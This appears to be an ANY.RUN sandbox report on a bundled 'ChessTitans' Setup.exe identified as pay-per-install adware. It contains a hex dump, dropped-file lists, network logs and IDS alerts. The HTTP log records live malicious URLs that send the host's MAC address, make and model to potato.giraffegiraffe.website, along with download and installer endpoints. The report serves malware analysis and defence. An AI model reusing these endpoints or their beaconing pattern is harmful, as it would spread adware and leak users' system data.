C004400650073006B0074006F0070005C004100630072006F0062006100740020005200650061006400650072002000440043002E006C006E006B0000006C006E006B000000630072006F0062006100740020005200650061006400650072002000440043005C005200650061006400650072005C004100630072006F0052006400330032002E00650078006500000013060000000085F990753C53660678D4130650D413063853660684D41306546F9D76BC66AC760000000024D913066C31917524D91306553E917573FC6A06E4DB130600000000813E91754CD9130650D91306385366060DFB6A0612DC13060000000073FC6A06740A91750000000000000000000000000000000000000000000000000000000000000000FFFFFFFF000000000000000000000000713AE403873AE403713AE4030000000000000000000000000000000000000000000000000000000000000000922400007B5C580344D5130633AB47777B88AFEFFC0B00001027000008000000ED53020078D51306F8AA4777ED5302007B5C580398D51306E8DED40318D6130600000000A2010000D8D50000D763D17E88D5130682919175D8D513068CD51306279591750000000074E3D403B4D51306CD94917574E3D40360D61306E8DED403E194917500000000E8DED40360D61306BCD5130603000000000000000300000043003A005C00550073006500720073005C005000750062006C00690063005C004400650073006B0074006F0070005C004100630072006F0062006100740020005200650061006400650072002000440043002E006C006E006B0000006C006E006B000000630072006F0062006100740020005200650061006400650072002000440043005C005200650061006400650072005C004100630072006F0052006400330032002E00650078006500000013060000000085F990753C53660678D4130650D413063853660684D41306546F9D76BC66AC760000000024D913066C31917524D91306553E917573FC6A06E4DB130600000000813E91754CD9130650D91306385366060DFB6A0612DC13060000000073FC6A06740A91750000000000000000000000000000000000000000000000000000000000000000FFFFFFFF000000000000000000000000713AE403873AE403713AE4030000000000000000000000000000000000000000000000000000000000000000922400007B5C580344D5130633AB47777B88AFEFFC0B00001027000008000000ED53020078D51306F8AA4777ED5302007B5C580398D51306E8DED40318D6130600000000A2010000D8D50000D763D17E88D5130682919175D8D513068CD51306279591750000000074E3D403B4D51306CD94917574E3D40360D61306E8DED403E194917500000000E8DED40360D61306BCD51306
Executable files
129
Suspicious files
68
Text files
303
Unknown types
45

Dropped files

PID
Process
Filename
Type
2780chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\bc31c5db-827a-473b-99dd-0e218bafbd75.tmp
MD5:
SHA256:
2780chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000012.dbtmp
MD5:
SHA256:
2780chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\000012.dbtmp
MD5:
SHA256:
2780chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\LOG.oldtext
MD5:
SHA256:
2780chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Last Versiontext
MD5:
SHA256:
2780chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.old~RF465148.TMPtext
MD5:
SHA256:
2780chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\LOG.old~RF465148.TMPtext
MD5:
SHA256:
2780chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_www.google.de_0.indexeddb.leveldb\000001.dbtmp
MD5:
SHA256:
2780chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.old~RF465167.TMPtext
MD5:
SHA256:
2780chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.oldtext
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
252
TCP/UDP connections
233
DNS requests
136
Threats
251

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3952
Setup.exe
GET
200
54.88.21.193:80
http://potato.giraffegiraffe.website/report.php?typ=sys&affId=1524&instId=995&ho_transId=HO3684968225ba552acbb12d&transId=368496822&chk_s_b=&chk_s_v=DELL%20%20-%201&chk_c_ma=DELL&chk_c_mo=DELL&chk_mac=52:54:00:4A:AD:1120:41:53:59:4E:FF&randid=0.16128030944879285
US
malicious
3952
Setup.exe
GET
200
54.88.21.193:80
http://potato.giraffegiraffe.website/report.php?typ=3rd_party&transId=368496822&affId=1524&instId=995&ho_transId=HO3684968225ba552acbb12d&s1=225&s2=&s3=&s4=LP_DEF&s5=1358744660&cid=5d979308c3b6ea5ad7e984e628c8cac1&uac=true&randid=0.8544977797938209
US
malicious
3952
Setup.exe
GET
200
54.88.21.193:80
http://potato.giraffegiraffe.website/report.php?typ=download&transId=368496822&affId=1524&instId=995&ho_transId=HO3684968225ba552acbb12d&s1=225&s2=&s3=&s4=LP_DEF&s5=1358744660&cid=5d979308c3b6ea5ad7e984e628c8cac1&uac=true&randid=0.6392531107517454&offerId=722
US
malicious
3952
Setup.exe
GET
200
54.88.21.193:80
http://potato.giraffegiraffe.website/report.php?typ=execution&transId=368496822&affId=1524&instId=995&ho_transId=HO3684968225ba552acbb12d&s1=225&s2=&s3=&s4=LP_DEF&s5=1358744660&cid=5d979308c3b6ea5ad7e984e628c8cac1&uac=true&randid=0.6399745192947419&offerId=722
US
malicious
3952
Setup.exe
GET
200
54.88.21.193:80
http://potato.giraffegiraffe.website/report.php?typ=download&transId=368496822&affId=1524&instId=995&ho_transId=HO3684968225ba552acbb12d&s1=225&s2=&s3=&s4=LP_DEF&s5=1358744660&cid=5d979308c3b6ea5ad7e984e628c8cac1&uac=true&randid=0.9113989269537145&offerId=365
US
malicious
3952
Setup.exe
GET
200
54.88.21.193:80
http://potato.giraffegiraffe.website/report.php?typ=download&transId=368496822&affId=1524&instId=995&ho_transId=HO3684968225ba552acbb12d&s1=225&s2=&s3=&s4=LP_DEF&s5=1358744660&cid=5d979308c3b6ea5ad7e984e628c8cac1&uac=true&randid=0.32166546544831864&offerId=668
US
malicious
3952
Setup.exe
GET
200
54.88.21.193:80
http://potato.giraffegiraffe.website/report.php?typ=execution&transId=368496822&affId=1524&instId=995&ho_transId=HO3684968225ba552acbb12d&s1=225&s2=&s3=&s4=LP_DEF&s5=1358744660&cid=5d979308c3b6ea5ad7e984e628c8cac1&uac=true&randid=0.7458039194826558&offerId=365
US
malicious
2780
chrome.exe
GET
200
143.204.98.52:80
http://frogs.drinkselection.online/?affId=1524&instId=995&appTitle=ChessTitans&s1=225&exe=1
US
executable
698 Kb
whitelisted
3952
Setup.exe
POST
403
143.204.98.193:80
http://dill.orangessmoke.xyz/installer.php?affId=1524&instId=995&ho_trackingid=HO3684968225ba552acbb12d&trackingId=368496822&cc=FR&untracked=&uac=1&osd=351&net=4.6.01055&cid=5d979308c3b6ea5ad7e984e628c8cac1&v=3&kid=hqmrb21alk3op0jmdb9
US
html
694 b
whitelisted
3952
Setup.exe
GET
200
143.204.98.57:80
http://d2adi7hu49xk5t.cloudfront.net/normal_bg4.png
US
image
62.3 Kb
shared
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3952
Setup.exe
143.204.98.57:80
d2adi7hu49xk5t.cloudfront.net
US
unknown
2780
chrome.exe
172.217.21.227:443
clientservices.googleapis.com
Google Inc.
US
whitelisted
2780
chrome.exe
172.217.23.131:443
www.google.de
Google Inc.
US
whitelisted
2780
chrome.exe
172.217.18.10:443
safebrowsing.googleapis.com
Google Inc.
US
whitelisted
2780
chrome.exe
216.58.205.228:443
www.google.com
Google Inc.
US
whitelisted
2780
chrome.exe
216.58.214.109:443
accounts.google.com
Google Inc.
US
whitelisted
2780
chrome.exe
216.58.214.42:443
fonts.googleapis.com
Google Inc.
US
whitelisted
2780
chrome.exe
143.204.98.52:80
frogs.drinkselection.online
US
suspicious
2780
chrome.exe
172.217.21.238:443
sb-ssl.google.com
Google Inc.
US
whitelisted
2780
chrome.exe
216.58.214.35:443
fonts.gstatic.com
Google Inc.
US
whitelisted

DNS requests

Domain
IP
Reputation
www.google.de
  • 172.217.23.131
whitelisted
clientservices.googleapis.com
  • 172.217.21.227
whitelisted
safebrowsing.googleapis.com
  • 172.217.18.10
whitelisted
accounts.google.com
  • 216.58.214.109
shared
ssl.gstatic.com
  • 172.217.21.227
whitelisted
www.google.com
  • 216.58.205.228
malicious
www.google.fr
  • 172.217.23.131
whitelisted
fonts.googleapis.com
  • 216.58.214.42
whitelisted
fonts.gstatic.com
  • 216.58.214.35
whitelisted
frogs.drinkselection.online
  • 143.204.98.52
  • 143.204.98.228
  • 143.204.98.171
  • 143.204.98.217
whitelisted

Threats

PID
Process
Class
Message
2780
chrome.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2780
chrome.exe
Misc activity
ET INFO EXE - Served Attached HTTP
2780
chrome.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3952
Setup.exe
A Network Trojan was detected
ET MALWARE PPI User-Agent (InstallCapital)
3952
Setup.exe
Misc activity
ADWARE [PTsecurity] SoftwareBundler:Win32/Prepscram
3952
Setup.exe
A Network Trojan was detected
ET MALWARE PPI User-Agent (InstallCapital)
3952
Setup.exe
A Network Trojan was detected
ET MALWARE PPI User-Agent (InstallCapital)
3952
Setup.exe
A Network Trojan was detected
ET MALWARE PPI User-Agent (InstallCapital)
3952
Setup.exe
A Network Trojan was detected
ET MALWARE PPI User-Agent (InstallCapital)
3952
Setup.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
11 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
new 1.txt